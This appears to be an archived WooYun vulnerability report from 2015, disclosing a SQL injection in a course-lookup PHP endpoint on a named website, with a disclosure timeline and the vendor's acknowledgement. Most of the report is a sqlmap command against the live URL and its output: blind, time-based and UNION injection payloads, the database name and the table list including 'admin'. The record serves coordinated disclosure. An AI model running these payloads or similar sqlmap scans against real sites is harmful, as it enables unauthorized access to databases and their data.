乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-28: 细节已通知厂商并且等待厂商处理中 2015-07-28: 厂商已经确认,细节仅向厂商公开 2015-08-07: 细节向核心白帽子及相关领域专家公开 2015-08-17: 细节向普通白帽子公开 2015-08-27: 细节向实习白帽子公开 2015-09-11: 细节向公众公开
不知道官方是不是疏忽了,没有修复完全,这里提醒一下。安全第一。
sqlmap.py -u "http://37t.ranknowcn.com/web_q_js/web_js_ajax/lesson.ajax.php?courseType=101"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: courseType (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: courseType=101 AND 6008=6008 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: courseType=101 AND (SELECT * FROM (SELECT(SLEEP(5)))bbeP) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: courseType=101 UNION ALL SELECT NULL,CONCAT(0x716b787671,0x44744275797845524366,0x717a6a6271),NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: Nginx, PHP 5.3.5back-end DBMS: MySQL 5.0.12current database: '37t'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: courseType (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: courseType=101 AND 6008=6008 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: courseType=101 AND (SELECT * FROM (SELECT(SLEEP(5)))bbeP) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: courseType=101 UNION ALL SELECT NULL,CONCAT(0x716b787671,0x44744275797845524366,0x717a6a6271),NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: Nginx, PHP 5.3.5back-end DBMS: MySQL 5.0.12Database: 37t[6 tables]+------------+| admin || admintype || course || courseType || teacher || uploadFile |+------------+
参数过滤
危害等级:中
漏洞Rank:8
确认时间:2015-07-28 16:33
多谢,我们尽快处理,的确是疏忽了
暂无